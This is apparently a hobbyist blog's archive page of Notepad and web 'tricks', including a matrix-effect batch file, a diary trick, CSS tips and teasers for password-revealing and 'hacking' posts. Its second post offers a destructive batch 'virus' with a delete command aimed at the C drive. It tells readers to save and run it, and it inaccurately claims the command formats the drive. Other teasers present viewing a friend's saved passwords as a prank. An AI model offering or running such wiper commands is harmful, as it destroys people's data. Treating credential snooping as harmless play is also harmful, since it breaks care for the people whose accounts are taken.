Pages

Showing posts with label Trick. Show all posts
Showing posts with label Trick. Show all posts

Saturday, January 25

TOP 3 NOTEPAD TRICKS

 1. Matrix Effect Trick

matrix effect trick
In this trick i will show you to make a batch file in notepad which will act as matrix effect that you might have seen in movies.Matrix effect is basically number flashes in green color.

    1. Open Notepad and copy below code into it.

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
 %random% %random%goto start

    2. Now save this file as Matrix.bat (name can be anything but .bat is must)
    3. Open your saved file and you will have matrix effect on your screen.

NOTE : You can change color 02 to any other number(for instance 03 for blue)

2. Creating Virus That Format C Drive

computer virus
In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.

    1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y
  
    2. Then Save this file as virus.bat
    3. Now, running this file format C Drive.

NOTE: PLEASE DON'T TRY IT ON YOUR OWN LAPTOP.USE IT ON YOUR RISK.

3. Making Personal Diary Using Notepad 

notepad tricks
Here you will learn to use notepad as Diary or a log book to keep record of your daily work instead of using pen and paper.

    1. Open Notepad and Type .LOG (in capital Letters and press enter
    2. Save the program with any name and close it.
    3. Open the file again. Now you can see current date and time, This will happen every time when you reopen notepad.

ENJOY!!

Sunday, March 3

Pranking

STEP 1 : Just Go to crushbits
and sign up for Free

STEP 2 : There you will get a a link something like this
http://www.crushbits.com/findcrush/15790

STEP 3 :

Saturday, February 2

KEYBOARD LED FLUCTUATING TRICK


Today i will be showing you an interesting trick which will let your keyboard led light to dance. Basically we will be creating a vbscript to make caps lock, num lock and scroll lock to perform this trick. So lets get started.

 How to do that ?

 1. Open Notepad and copy below codes into it.
 

2. Then save this file as led.vbs (.vbs is must)

 3. Open your save file and see your keyboard led blinking like disco lights.

 How to disable blinking Led ? 

1. First open Task Manager [ctrl+alt+del ]

2. Then Go to process tab.

3. Select wscript.exe

4. Click on End process.
Enjoy....

Friday, January 18

PASSWORD IDENTIFYING

   This is trick which will let you to see password behind asterisks. You might be thinking what is asterisks. It is dots or stars you see when you type password. This trick will let you to see password behind asterisks. Often people save their password on browser so this trick will let you get their password easily.

    * Go to the page that contain password in asterisks.
    * Now copy the following code.

Saturday, January 12

HACK CHROME SAVED PASSWORD

Previously I had showed you how to see password in opera i.e.NOT HACKING. In this post i will show you same thing but with different method i.e. from your google chrome web browser. This trick is simple yet very powerfull  to view or hack saved password in google chrome. It does not  matter for which website the password is saved it will work on all of them. It will work on Facebook, Gmail, Yahoo, twitter and many more.

Thursday, January 10

BROADBAND HACKING


In this article,I am discussing about how to hack a broadband connection.But I will suggest not to hack illegally.Well without wasting time,i am just showing few steps which you have to follow.

Monday, August 13

Rainbow Effect

Sorry for delay in my next  article as my schedule was too hactic,so in this article,I am discussing about rainbow effect in your web page. Recently i added that rainbow effects in my blog so i hope you will like it.Well when you move your cursor to that link some colors you will see which is just highlighting that link.
So in this article i'm sharing that rainbow effect in your web page

Monday, July 16

NOT HACKING

Aah!!well from many days i was quite busy in making a navigation menu of LinkedIn , but the work is still in progress so I decided to share something new.Well what I am showing to you is not hacking....it's just like if  your any friend challenged you to get his/her facebook  password and suppose if he/she just write his/her password in password place  and you all know that we are not able to see their password.
                                                                                     So question arises what will you do

Sunday, July 1

GOOGLE

                                                                      As you already have seen top navigation menu in google,so I decided to write my post on this beautiful feature of google.This navigation is quite attractive.Well,it is having a nice white grayed image in background with cool blue hover effect.

Saturday, June 30

How to create CSS3 "box shadow " property




In this article,I discuss about "box shadow" property of CSS3.Basically its coding is quite simple and it is done for the attraction of people.It shows a clear view.

As shown in the above diagram,you can copy in your notepad and save it with .html extension.
If you write the following code,and open it in internet explorer,then you will get as....

Popular Posts